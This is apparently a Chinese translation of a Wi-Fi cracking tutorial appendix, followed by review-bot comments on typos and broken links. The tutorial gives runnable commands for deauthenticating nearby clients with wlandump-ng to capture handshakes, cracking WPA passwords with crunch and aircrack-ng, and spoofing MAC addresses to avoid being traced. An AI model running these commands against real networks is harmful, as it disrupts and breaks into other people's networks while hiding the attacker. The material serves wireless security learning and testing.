4路握手有了更好的工具,叫做`wlandump-ng`。这个工具属于与hashcat相关的工具集[hcxtools](https://github.com/ZerBea/hcxtools)系列之中,由[ZerBea](https://github.com/ZerBea)开发,名声已经超过了`airdump-ng`。`wlandump-ng`允许你一次性从每个附近的网络上全面捕获握手信息,跳过Wi-Fi信道,以增加收集。 + + +```bash +# 克隆hcxtools +git clone https://github.com/ZerBea/hcxtools +cd hcxtools + +# 构建并且安装 +# 你将可能需要apt来安装需要的依赖 +# https://github.com/ZerBea/hcxtools#requirements +make +sudo make install + +# 覆盖所有失去从附近接入点失去连接的客户端并且监听重新连接 +# 将wlan0替换成你的无线设备名称 +wlandump-ng -i wlan0 -o capture.cap -c 1 -t 60 -d 100 -D 10 -m 512 -b -r -s 20 + +# 一旦你获得了捕获的文件,你可以利用以下命令将其转换成hashcat捕获格式 +cap2hccapx.bin capture.cap capture.hccapx +``` + +`wlandump-ng`命令行参数(使用`h`标志来获得完整列表): + +- `-c 1`:从通道1开始的2.4Ghz范围(将转到13) +- `-t 60':每个通道停留60s(实验值较低,默认值为5) +- `-d 100`:发送deauth每100个信标帧 +- `-D 10`:每隔10个信标帧发送解析数据包 +- “-m 512”:内部缓冲区大小,对于低资源机器使用512 +- `-b`:激活信号到最后10个探测请求 +- `-r`:如果循环在通道1上,则重置deauthentication / detachosciation计数器 +- `-s 20`:显示20条状态行 + +**警告:**在大多数地方使用这个是不合法的。更多信息请参考[这]((https://github.com/ZerBea/hcxtools#warning)。 + +`wlandump-ng`也提供了在被动模式下运行的选项,而不会发送任何解除认证/解除关联帧。 如果你对中断你周围的人的网络活动(你应该是)敏感,则建议你这样做。代价是你将获得的握手少得多,这种方法使得捕获不可见。 + +```bash +# 在被动模式下使用默认设置运行 +wlandump-ng -i wlan0 -o capture.cap -p -s 20 +``` + +## 使用`crunch`生成单词列表 + +`crunch`是使用给定字符串或模式的组合生成单词列表的工具。 我们可以使用crunch来即时生成密码列表,并将其管理为`aircrack-ng`,而不会将单词列表保存到磁盘。 + + +```bash +# 安装crunch +sudo apt-get install crunch +``` + +要想知道如何运行crunch,可以从命令行运行(一旦开始发送密码,就可以按`ctrl-c`): + +```bash +# 语法8 8是生成密码的最小长度和最大长度 +# 01234567890是组合/排列构成密码的一组字符 +crunch 8 8 0123456789 +``` + +``` +Crunch现在将生成以下数据量:900000000字节 +858 MB +0 GB +0 TB +0 PB +Crunch现在将生成以下行数:100000000 +00000000 +00000001 +00000002 +00000003 +00000004 +00000005 +00000006 +00000007 +00000008 +00000009 +... 
+99999999 +``` + +我们可以将`crunch`的输出作为输入输出到`aircrack-ng`,使用它生成的密码作为我们的单词列表。 这里我们使用`crunch`特殊规则字符`%`来表示数字。 此命令尝试破解10位电话号码的WPA密码(使用crunch即时生成的102GB的号码): + +```bash +# 我们也可以使用-t "@^%,"  使用模式'@' 替换小写 ',' -替换大写 +# '%' -替换数字以及'^' -替换特殊字符 +# *************** 不要忘记最后的'-' +crunch 10 10 -t "%%%%%%%%%%" | aircrack-ng -a2 capture.cap -b 58:98:35:CB:A2:77 -w - +``` + +感谢[@hiteshnayak305](https://github.com/hiteshnayak305)介绍`crunch`并将此次更新作为[PR](https://github.com/brannondorsey/wifi-cracking/pull/17)。 + +## 利用`macchanger`魄户你的身份 + +每当您使用Wi-Fi进行任何远程恶意攻击时,最好是伪造你的Wi-Fi设备的MAC地址,以便记录的任何网络流量都不能与设备制造商分配的串行连接。 + +这是利用`macchanger`的一个小尝试: + +```bash +# 下载MAC changer +sudo apt-get install macchanger + +# 关闭设备 +sudo ifconfig wlan0 down + +# 改变mac +# -A 为有效的供应商分配一个随机的MAC w/a +# -r 让它真正随机 +# -p 将其恢复到原始的硬件MAC +sudo macchanger -A wlan0 + +# 启动设备 +sudo ifconfig wlan0 up +``` + +如果你有多张无线网卡,那么改变所有无线网卡的MAC是个好主意。 或者更好的是,当你尝试捕获握手时,将未使用的无线接口关闭,尽可能少地留下痕迹。 请注意,欺骗更改在重新启动时不会持续。
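Review bot: Typo in the new CHANGELOG.md hunk, 1.1 entry: `Programatic wordlist generation with `crunch`` should read `Programmatic wordlist generation with `crunch``. Since this file is new, it is also worth dating the entries (or linking each to its commit) so the changelog can be cross-checked later.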
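Review bot: The README.md hunk at `@@ -13,10` drops the upstream hardware reference along with the Amazon link: the removed bullet pointed at http://aircrack-ng.org/doku.php?id=compatible_cards, while the replacement points only at a 2016 third-party "best dongles" list. Keep the Aircrack-ng compatible_cards page as the primary reference (it is maintained by the tool's authors and covers driver/monitor-mode support, which is the actual requirement) and cite the wirelesshack list as a supplementary suggestion, e.g. `(see the [Aircrack-ng compatibility list](http://aircrack-ng.org/doku.php?id=compatible_cards); [this list](http://www.wirelesshack.org/...) also has suggestions)`. The same dated link is repeated in appendix.md and both translations, so fix it in all four places together.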
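Review bot: Several cross-links in the new README.zh.md hunk are broken: in the 附录 section, `[附录](#appendix.zh.md)` has a stray `#`, which turns a file link into an in-page anchor that does not exist; and `(#deauth-attack)` and `(#crack-the-network-password)` are English heading slugs copied from README.md, but this file's headings are `## 解除认证攻击` and `### 破解网络密码`, so those anchors resolve to nothing. Use `(appendix.zh.md)` and the Chinese heading anchors (as `(#命令列表)` already does). Also in this hunk: `你将会在你的`POI_FILE`看到` should be `POT_FILE` to match the `POT_FILE=hackme.pot` variable in the command above it; the list item `-  利用`macchanger`` has a double space after the dash; the intro's `一个可选的破解认证的攻击` and the deauth section's `假的接触认证数据包` should both use `解除认证` (deauthentication), matching the section title; and the last sentence of 致谢 is truncated at `他们还在[Reddit](...)和GitHub。`, dropping the "also provided suggestions and typo fixes" clause from the English original.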
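Review bot: In the new appendix.md hunk the table of contents names the wrong tool: `Capturing handshakes with `landump-ng`` should be `wlandump-ng`, as the section heading below it says. Further wording fixes in the same hunk: `In an effort two keep` should be `to keep`; `prefered` should be `preferred`; `has notable perks over `airdump-ng`` should be ``airodump-ng``; the comment `# blanket death connected clients` should be `deauth`; `disassosciation` (twice) should be `disassociation`; ``crunch`is a tool` is missing a space; the heading `Protecting your identify` should be `identity`; `spoof your the MAC address` should be `spoof the MAC address` and `tied to serial assigned` should be `tied to the serial assigned`; and the macchanger comment `-A pics a random MAC` should be `picks`. One consistency point in the crunch example: the comment says `01234567890 is the set of characters` (11 characters, trailing zero repeated) while the command passes `0123456789`; the comment should match the argument. Finally, the sentence `You will likely need to apt install the required dependencies` would be more useful with the actual `apt-get install` line the hcxtools requirements page lists, rather than only a URL inside a code block.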
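Review bot: The new appendix.zh.md hunk has Markdown rendering breaks that should be fixed before merge. Item `5.将捕获文件转换为` lacks the space after `5.`, so it will render as a plain paragraph rather than the fifth list item; in the `wlandump-ng` flag list, `` `-t 60' `` mixes a backtick with an apostrophe and `“-m 512”` uses curly quotes, so neither renders as inline code; and `[这]((https://github.com/ZerBea/hcxtools#warning)` has a doubled opening parenthesis, which breaks the link. Content mismatches in the same hunk: the heading `## 利用`macchanger`魄户你的身份` is garbled and should read `保护你的身份`, as the table of contents above it already does; `无限诊断` should be `无线诊断`; `捕获手握手` should be `捕获到握手`; `使用`h`标志` should be `` `-h` ``; and `detachosciation` in the `-r` bullet is a leftover of the English typo and should be `解除关联`. Also, the crunch sample output has been translated (`Crunch现在将生成以下数据量:900000000字节`); quoted program output should stay verbatim as the tool prints it, with any translation given in the surrounding prose, otherwise readers cannot match it against what they see on screen.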